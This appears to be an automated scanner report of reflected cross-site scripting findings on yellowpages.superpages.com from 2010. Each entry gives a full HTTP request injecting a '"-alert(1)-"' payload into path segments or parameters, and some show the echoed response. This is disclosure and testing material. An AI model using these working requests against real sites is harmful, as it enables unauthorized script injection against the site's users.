The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4ed6"-alert(1)-"27de61fbe10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsb4ed6"-alert(1)-"27de61fbe10/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7749b"-alert(1)-"166f9789793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.js7749b"-alert(1)-"166f9789793 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f314a"-alert(1)-"d718b79fe66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf314a"-alert(1)-"d718b79fe66/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be851"-alert(1)-"c609dcd305c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbe851"-alert(1)-"c609dcd305c/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9282"-alert(1)-"39f1a17bdb6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jsb9282"-alert(1)-"39f1a17bdb6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9a27"-alert(1)-"97869801f49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond9a27"-alert(1)-"97869801f49/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5868"-alert(1)-"87bdb7fff34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsf5868"-alert(1)-"87bdb7fff34/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bb72"-alert(1)-"9311ac1eae6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js3bb72"-alert(1)-"9311ac1eae6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e93e"-alert(1)-"e0257fb0cce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common6e93e"-alert(1)-"e0257fb0cce/js/stPtsDropDown.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 567fe"-alert(1)-"a7192a45b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js567fe"-alert(1)-"a7192a45b5c/stPtsDropDown.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d80"-alert(1)-"d75b6dd7fef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/stPtsDropDown.js19d80"-alert(1)-"d75b6dd7fef HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf650"-alert(1)-"78afb6ecf46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbf650"-alert(1)-"78afb6ecf46/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2faa4"-alert(1)-"0330f6d9404 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2faa4"-alert(1)-"0330f6d9404/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f05f"-alert(1)-"e45de1e8136 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js9f05f"-alert(1)-"e45de1e8136 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fded6"-alert(1)-"0b6dc67d1c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonfded6"-alert(1)-"0b6dc67d1c1/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439d0"-alert(1)-"5c86a9d76c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js439d0"-alert(1)-"5c86a9d76c0/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a2b"-alert(1)-"07809799c0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsc2a2b"-alert(1)-"07809799c0f HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3dee"-alert(1)-"9e04f429db9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond3dee"-alert(1)-"9e04f429db9/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32abc"-alert(1)-"2bf1a02631b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js32abc"-alert(1)-"2bf1a02631b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50197"-alert(1)-"c2eac5868b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms50197"-alert(1)-"c2eac5868b/js/verifyShopping.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7601"-alert(1)-"10e26b82b50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/jsd7601"-alert(1)-"10e26b82b50/verifyShopping.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dc1"-alert(1)-"4f40b38d03b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/js/verifyShopping.jsb3dc1"-alert(1)-"4f40b38d03b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0c4c"-alert(1)-"291bea29b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspd0c4c"-alert(1)-"291bea29b59 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspd0c4c"-alert(1)-"291bea29b59?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
1.462. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://yellowpages.superpages.com
Path: /profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b62"-alert(1)-"19f13f0d1a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?d3b62"-alert(1)-"19f13f0d1a1=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=E40CDAAE7234B340F5E476169B1B68EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32437
Date: Sun, 19 Dec 2010 03:39:57 GMT
Connection: close

<!-- -->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title> Superpages.com
...[SNIP]...
ages.com'; var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?d3b62"-alert(1)-"19f13f0d1a1=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5fbb"-alert(1)-"b1561fffde0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profilera5fbb"-alert(1)-"b1561fffde0/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4f1f"-alert(1)-"6e2adb7dd06 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jspd4f1f"-alert(1)-"6e2adb7dd06 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e951a"-alert(1)-"b64c38705bf was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=e951a"-alert(1)-"b64c38705bf HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=15C201AFDF87CEF38C2736905BA91573; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64044
Date: Sun, 19 Dec 2010 03:41:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
m'; var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=e951a"-alert(1)-"b64c38705bf";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...
The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aaab"-alert(1)-"3ce839e7847 was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/abook.jsp?requestAction=toCoupons4aaab"-alert(1)-"3ce839e7847 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=2A454A9F2598C6898BE37FCBC8B671AA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 63958
Date: Sun, 19 Dec 2010 03:40:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
Superpagescom';
